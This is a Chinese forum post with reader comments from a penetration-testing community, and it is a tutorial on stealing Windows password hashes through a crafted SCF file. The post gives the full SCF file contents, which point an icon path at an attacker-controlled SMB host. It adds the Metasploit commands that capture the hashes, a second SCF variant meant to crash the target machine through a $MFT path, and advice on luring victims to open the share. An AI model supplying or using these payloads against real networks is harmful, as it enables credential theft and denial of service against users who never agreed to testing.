通过SCF文件攻击网络共享文件夹并获取用户系统密码

2017-11-10 09:46:00 15 4679
通过学习看雪一篇文章对SCF文件利用攻击网络共享文件夹,由于原文有些地方没有提及,于是便尝试了一下复现,个人认为在内网渗透中某些技巧灵活运用起来能事半功倍,多学习一种新方式,就可能多一种新思路

1.        通过创建SCF文件指向攻击者ip
2.        创建共享文件夹放入SCF文件并设置权限为公共访问
3.        浏览或上传文件到目标系统成功获取到用户系统HASH

通过创建SCF文件,修改其中地址为攻击者ip
[Shell]

Command=2

IconFile=\\192.168.1.214\share\test.ico

[Taskbar]

Command=ToggleDesktop


创建共享文件夹并设置权限



监听smb服务
use auxiliary/server/capture/smb
设置HASH密码保存地址
set JOHNPWFILE xxxxx

通过浏览文件夹成功获取到用户系统密码



得到访问者电脑系统密码
第一列为用户密码,第二列为系统用户登录名
由此成功破解密码为aasron


提示:
1.攻击目标死机SCF文件,根据原文解释无需攻击者或被攻击者操作
[Shell]

Command=2

IconFile= c:\$MFT\123

[Taskbar]

Command=ToggleDesktop
2.如果指定攻击某台系统需要对方开启写入权限并写入文件、否则则要使用本机上传SCF文件并诱使被攻击者访问


原文:
https://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458286248&idx=1&sn=4cdbf73f47753a979024958622b468e7&chksm=b181482286f6c1348bfb6be7e52716381befddb979c5e7b94335c71f9532e9691e979833df78&scene=38#wechat_redirect

PS:感谢看雪论坛这篇文章
类别 渗透测试

关于作者

Aasron6篇文章111篇回复

不断超越突破自己!

Aasron
15

评论15次

要评论?请先  登录  或  注册
  • 15楼
    鲁人甲007
    Rank: 8Rank: 8
    2017-11-11 09:10

    其实就是利用smb协议获取加密后的密文,展现形式上不同罢了。以前是用http,引用一个标签。得到的密文并不是我们想要的那种,比如hash传递,也就是说相当于我们搞了一个离线破解用户密码罢了(没有太多在线爆破日志)。似乎kali上有些工具对这个hash无法破解,我用cain破的嘿嘿

  • 14楼
    love71
    Rank: 1
    2017-11-10 15:07
    love71

    一台外网msf做监听机。同一个局域网内两台电脑,均可访问外网msf。一台做攻击机,一台做靶机,但是为什么监听不到呢!外网msfip\share\test.ico //这个文件是必须存在的?

    1
    Aasron

    不是必须存在的只是声明需要,重要的还是指向\\ip

    2

    那我的操作就应该没毛病了!但是监听不到,一个朋友也说公网的msf好像监听不到,不知道哪位表哥可以测测!

  • 13楼
    Aasron
    Rank: 1
    2017-11-10 13:37
    love71

    一台外网msf做监听机。同一个局域网内两台电脑,均可访问外网msf。一台做攻击机,一台做靶机,但是为什么监听不到呢!外网msfip\share\test.ico //这个文件是必须存在的?

    1

    不是必须存在的只是声明需要,重要的还是指向\\ip

  • 12楼
    love71
    Rank: 1
    2017-11-10 13:09

    一台外网msf做监听机。 同一个局域网内两台电脑,均可访问外网msf。一台做攻击机,一台做靶机,但是为什么监听不到呢! 外网msfip\share\test.ico //这个文件是必须存在的?

  • 11楼
    rainismG
    Rank: 1
    2017-11-10 11:59

    其实很有很多获取ntlm hash的方法,类似responder,WordSteal。常见的利用方式是smb中继攻击

  • 10楼
    GET丶Boy
    2017-11-10 11:51

    你发的这个,我msf那里exploit直接报错 Auxiliary failed: Rex::BindFailed The address is already in use or unavailable:

  • 9楼
    iso60001
    Rank: 1
    2017-11-10 10:57

    内网不一定那么打的那么 及时啊

  • 8楼
    Aasron
    Rank: 1
    2017-11-10 10:46
    iso60001

    这看起来似乎危害很大啊,不打补丁的话,就是要第一时间找到共享文件夹

    1

    有补丁的

  • 7楼
    Aasron
    Rank: 1
    2017-11-10 10:45
    gcz1992

    可以,很强势,感觉类似于ftp上的那种钓鱼文件,不过这个更加方便。

    1

    是的,就是建立连接后嗅探。

  • 6楼
    iso60001
    Rank: 1
    2017-11-10 10:39

    这看起来似乎危害很大啊,不打补丁的话,就是要第一时间找到共享文件夹

  • 5楼
    gcz1992
    Rank: 2
    2017-11-10 10:30

    可以,很强势,感觉类似于ftp上的那种钓鱼文件,不过这个更加方便。

  • 4楼
    Aasron
    Rank: 1
    2017-11-10 10:28
    iso60001

    这个共享文件夹是不是需要引导别人访问啊

    1

    两种场景,一个诱导别人,一个是他开放了权限,上传文件进去即可

  • 3楼
    iso60001
    Rank: 1
    2017-11-10 10:19

    这个共享文件夹是不是需要引导别人访问啊

  • 2楼
    Aasron
    Rank: 1
    2017-11-10 09:53
    残雪

    内网中搞运维人员也是一种思路

    1

    是的,内网中这种环境也很常见

  • 1楼
    残雪
    Rank: 1
    2017-11-10 09:50

    内网中搞运维人员也是一种思路